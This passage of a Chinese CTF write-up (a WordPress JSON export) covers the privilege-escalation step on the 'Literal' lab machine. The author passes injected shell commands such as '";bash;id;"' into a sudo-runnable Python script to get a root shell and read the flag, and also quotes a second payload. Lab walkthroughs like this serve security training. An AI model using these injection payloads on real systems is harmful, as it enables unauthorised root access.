|\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\ncarlos@literal:~$ \/opt\/my_things\/blog\/update_project_status.py 1\n+-------+-----------------------------------------+---------------------+------------+-----------+\n| proid | proname | prodatecreated | prodateend | prostatus |\n+-------+-----------------------------------------+---------------------+------------+-----------+\n| 1 | Ascii Art Python - ABCdario with colors | 2021-09-20 17:51:59 | 2021-09-20 | Done |\n+-------+-----------------------------------------+---------------------+------------+-----------+\ncarlos@literal:~$ \/opt\/my_things\/blog\/update_project_status.py 12\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\n| proid | proname | prodatecreated | prodateend | prostatus |\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\n| 12 | Blog - Improve the appearance of the dashboard\/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing |\n+-------+--------------------------------------------------------------+---------------------+------------+-----------+\ncarlos@literal:~$ \/opt\/my_things\/blog\/update_project_status.py '";whoami;id;"'\nERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1\ncarlos\nuid=1000(carlos) gid=1000(carlos) groups=1000(carlos)\nsh: 1: ;: not found\ncarlos@literal:~$ sudo \/opt\/my_things\/blog\/update_project_status.py '";whoami;id;"'\nERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1\nroot\nuid=0(root) gid=0(root) groups=0(root)\nsh: 1: ;: not found<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5sudo\u5373\u53ef\u83b7\u53d6rootshell\uff01<\/p>\n
<\/div><\/p>\ncarlos@literal:~$ sudo \/opt\/my_things\/blog\/update_project_status.py '";bash;id;"'\nERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1\nroot@literal:\/home\/carlos# cd ~\nroot@literal:~# ls -la\ntotal 36\ndrwx------ 5 root root 4096 Jun 8 15:20 .\ndrwxr-xr-x 20 root root 4096 Feb 7 2021 ..\nlrwxrwxrwx 1 root root 9 Feb 12 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc\ndrwxr-xr-x 3 root root 4096 Sep 18 2021 .cache\ndrwxr-xr-x 3 root root 4096 Feb 12 2021 .local\ndrwxr-xr-x 3 root root 4096 Jun 17 2022 my_things\n-rw-r--r-- 1 root root 161 Dec 5 2019 .profile\n-rw------- 1 root root 33 Feb 13 2021 root.txt\n-rw-r--r-- 1 root root 74 Sep 20 2021 .selected_editor\nroot@literal:~# cat root.txt\nca43cb966ef76475d9e0736feeb9f730<\/code><\/pre>\n\u8fd8\u770b\u5230\u6709\u4e00\u79cd\u89e3\u6cd5\u4e3a\uff1a<\/p>\n
sudo \/opt\/my_things\/blog\/update_project_status.py '\\! \/bin\/bash' Done<\/code><\/pre>\n\u4e5f\u633a\u597d\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Literal \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/literal] \u2514\u2500$ r […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-843","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/843","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=843"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/843\/revisions"}],"predecessor-version":[{"id":844,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/843\/revisions\/844"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=843"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=843"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20250608232520132\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201735.png\")
<\/div><\/p>\n![\"image-20250608232720029\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201736.png\")
<\/div>![\"image-20250608232752352\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201737.png\")
<\/div><\/p>\n![\"image-20250608234004774\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201738.png\")
<\/div><\/p>\n![\"image-20250608234510023\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201739.png\")
<\/div>![\"image-20250608235037910\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201740.png\")
<\/div><\/p>\n![\"image-20250608235600409\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201741.png\")
<\/div><\/p>\n![\"image-20250609000812789\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201742.png\")
<\/div><\/p>\n![\"image-20250609013013224\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201743.png\")
<\/div><\/p>\n![\"image-20250609013635976\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201744.png\")
<\/div><\/p>\n![\"image-20250609015839187\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506090201745.png\")
<\/div><\/p>\n